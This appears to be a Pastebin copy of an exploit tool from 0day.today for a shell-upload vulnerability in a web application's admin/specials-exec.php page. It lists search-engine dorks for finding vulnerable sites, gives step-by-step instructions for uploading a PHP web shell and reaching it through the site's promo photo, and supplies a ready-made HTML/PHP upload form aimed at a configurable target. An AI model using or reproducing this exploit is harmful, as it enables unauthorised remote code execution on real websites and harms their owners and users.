Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html xmlns="http://www.w3.org/1999/xhtml">
- <?php
- /*
- ############################ Specials-Exec Shell Upload Vulnerabilty ############################
- ###### Dork : Inurl:/admin/specials-exec.php
- ###### Dork 2 : Inurl:/specials-exec.php
- - Create a .html File and Put the Code.
- - Navigate the File in your Localhost .
- - and upload your Php Shell and you redirect to http://site/script/admin/access-denied.php
- - and You get the Message "Access Denied! You do not have access to this
- resource." but don't worry. when you get the Message go to Home Site and
- click in "Special Deals" and then you can see Promo Photo simply Click in the shell.
- # 0day.today [2016-10-30] #
- */
- /// Tools Devleped By #[MK]
- $Target = "localhost"; ///// Past Target Vuln Here
- ?>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
- <title>Shell Upload</title>
- <script language="JavaScript" src="http://<?php echo $Target ;?>/validation/admin.js"></script>
- <table width="850" align="center">
- <form name="specialsForm" id="specialsForm" action="http://<?php echo $Target ;?>/admin/specials-exec.php" method="post" enctype="multipart/form-data" onsubmit="return specialsValidate(this)">
- <tr>
- <th>Name</th>
- <th>Description</th>
- <th>Price</th>
- <th>Start Date</th>
- <th>End Date</th>
- <th>Photo</th>
- <th>Action</th>
- </tr>
- <tr>
- <td><input type="text" name="name" id="name" class="textfield" /></td><br>
- <td><textarea name="description" id="description" class="textfield" rows="2" cols="15"></textarea></td><br>
- <td><input type="text" name="price" id="price" class="textfield" /></td><br>
- <td><input type="date" name="start_date" id="start_date" class="textfield" /></td><br>
- <td><input type="date" name="end_date" id="end_date" class="textfield" /></td><br>
- <td><input type="file" name="photo" id="photo"/></td><br>
- <td><input type="submit" name="Submit" value="Add" /></td><br>
- </tr>
- </form>
- </table>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement